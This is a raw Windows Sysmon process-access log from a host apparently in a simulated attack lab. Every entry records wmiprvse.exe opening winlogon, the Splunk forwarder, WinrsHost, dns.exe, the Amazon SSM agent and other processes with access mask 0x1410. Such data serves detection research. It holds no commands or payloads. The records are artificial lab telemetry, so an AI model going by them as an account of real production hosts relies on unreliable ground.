15:59:43.584{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 